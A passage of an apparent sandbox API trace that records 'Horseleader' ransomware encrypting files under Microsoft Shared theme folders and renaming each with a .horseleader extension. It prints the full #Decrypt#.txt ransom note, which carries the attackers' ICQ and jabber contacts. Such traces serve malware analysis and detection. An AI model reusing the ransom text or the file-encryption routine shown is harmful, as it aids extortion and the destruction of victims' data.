lpSrch=".txt") returned 0x0 [0248.188] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=555) returned 1 [0248.189] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x22b, lpOverlapped=0x0) returned 1 [0248.191] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdd5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.191] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x22b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x22b, lpOverlapped=0x0) returned 1 [0248.192] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.192] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.192] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.192] CloseHandle (hObject=0x1a4) returned 1 [0248.192] GetProcessHeap () returned 0x780000 [0248.192] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.192] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.INF.horseleader") returned 93 [0248.192] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\sumipntg.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\sumipntg.inf.horseleader")) returned 1 [0248.196] GetProcessHeap () returned 0x780000 [0248.196] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.196] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xad0e, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0248.196] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0248.196] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 81 [0248.196] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0248.196] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0248.197] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0248.197] lstrlenW (lpString=".testttjffg") returned 11 [0248.197] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0248.197] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.197] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.197] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.197] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG") returned 81 [0248.198] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0248.198] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=44302) returned 1 [0248.198] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.207] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.208] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.208] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.209] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.209] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.209] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xd0e, lpOverlapped=0x0) returned 1 [0248.209] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff2f2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.210] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xd0e, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xd0e, lpOverlapped=0x0) returned 1 [0248.210] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.210] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.210] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.210] CloseHandle (hObject=0x1a4) returned 1 [0248.210] GetProcessHeap () returned 0x780000 [0248.211] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.211] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG.horseleader") returned 93 [0248.211] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png.horseleader")) returned 1 [0248.212] GetProcessHeap () returned 0x780000 [0248.212] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.212] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xad0e, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0248.212] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.212] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\#Decrypt#.txt") returned 82 [0248.212] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.213] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0248.213] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.214] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0248.215] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.215] CloseHandle (hObject=0x158) returned 1 [0248.215] GetProcessHeap () returned 0x780000 [0248.215] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0248.215] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc24e4f00, ftCreationTime.dwHighDateTime=0x1c06b0e, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc24e4f00, ftLastWriteTime.dwHighDateTime=0x1c06b0e, nFileSizeHigh=0x0, nFileSizeLow=0x1c6c, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="THEMES.INF", cAlternateFileName="")) returned 1 [0248.215] lstrcmpiW (lpString1="THEMES.INF", lpString2="Windows") returned -1 [0248.215] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF") returned 70 [0248.215] StrStrIW (lpFirst="THEMES.INF", lpSrch=".horseleader") returned 0x0 [0248.215] lstrcmpW (lpString1="THEMES.INF", lpString2="#Decrypt#.txt") returned 1 [0248.215] lstrcmpW (lpString1="THEMES.INF", lpString2="_uninstalling_.png") returned 1 [0248.216] lstrlenW (lpString=".testttjffg") returned 11 [0248.216] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF", lpSrch=".testttjffg") returned 0x0 [0248.216] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0248.216] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0248.216] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\themes.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.217] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF") returned 70 [0248.217] StrStrW (lpFirst="THEMES.INF", lpSrch=".txt") returned 0x0 [0248.217] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7276) returned 1 [0248.217] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1c6c, lpOverlapped=0x0) returned 1 [0248.219] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe394, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.219] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1c6c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1c6c, lpOverlapped=0x0) returned 1 [0248.219] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.220] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0248.220] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0248.220] CloseHandle (hObject=0x158) returned 1 [0248.220] GetProcessHeap () returned 0x780000 [0248.220] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0248.220] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF.horseleader") returned 82 [0248.220] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\themes.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\themes.inf.horseleader")) returned 1 [0248.221] GetProcessHeap () returned 0x780000 [0248.221] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0248.221] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ad387f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7084efd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WATER", cAlternateFileName="")) returned 1 [0248.222] lstrcmpiW (lpString1="WATER", lpString2="Windows") returned -1 [0248.222] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER") returned 65 [0248.222] lstrcmpW (lpString1="WATER", lpString2=".") returned 1 [0248.222] lstrcmpW (lpString1="WATER", lpString2="..") returned 1 [0248.222] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.222] GetProcessHeap () returned 0x780000 [0248.222] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0248.222] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\*") returned 67 [0248.222] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ad387f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7084efd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.223] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.223] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\.") returned 67 [0248.223] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.223] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ad387f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7084efd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.223] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.223] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\..") returned 68 [0248.223] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0248.223] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0248.223] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xa6c, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0248.224] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0248.224] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 77 [0248.224] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0248.224] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0248.224] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0248.224] lstrlenW (lpString=".testttjffg") returned 11 [0248.224] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0248.224] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.224] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.224] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.225] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF") returned 77 [0248.225] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0248.225] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2668) returned 1 [0248.225] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xa6c, lpOverlapped=0x0) returned 1 [0248.227] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff594, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.228] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xa6c, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xa6c, lpOverlapped=0x0) returned 1 [0248.228] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.228] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.228] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.228] 